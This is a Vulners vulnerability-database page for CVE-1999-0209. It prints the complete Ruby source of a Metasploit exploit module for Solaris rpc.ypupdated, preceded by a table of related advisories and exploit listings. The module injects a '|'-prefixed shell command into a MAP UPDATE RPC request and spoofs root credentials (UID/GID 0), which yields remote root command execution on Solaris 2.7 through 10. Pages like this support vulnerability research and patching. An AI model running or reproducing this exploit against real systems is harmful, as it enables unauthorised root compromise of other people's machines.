Vulners
Lucene search
Solaris ypupdated Command Execution
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta) | 4 Apr 200800:00 | – | zdt |
 | CVE-1999-0209 | 4 Apr 200800:00 | – | circl |
 | CVE-1999-0209 | 29 Sep 199904:00 | – | cve |
 | CVE-1999-0209 | 29 Sep 199904:00 | – | cvelist |
 | Solaris - ypupdated Command Execution (Metasploit) | 25 Jul 201000:00 | – | exploitdb |
| Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit) | 4 Apr 200800:00 | – | exploitdb |
 | Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit) | 4 Apr 200800:00 | – | exploitpack |
 | Solaris ypupdated Command Execution | 18 Apr 200801:33 | – | metasploit |
 | CVE-1999-0209 | 14 Aug 199004:00 | – | nvd |
 | CAU-EX-2008-0001.txt | 8 Apr 200800:00 | – | packetstorm |
10
`require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <[email protected]>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '1999-0209'],
['OSVDB', '11517'],
['BID', '1749'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status 'Sending PortMap request for ypupdated program'
pport = sunrpc_create('udp', program, progver)
print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
print_status 'Waiting for response...'
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_good 'No Errors, appears to have succeeded!'
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_status 'Warning: ' + $!
print_status 'Exploit may or may not have succeeded.'
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2009 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.42142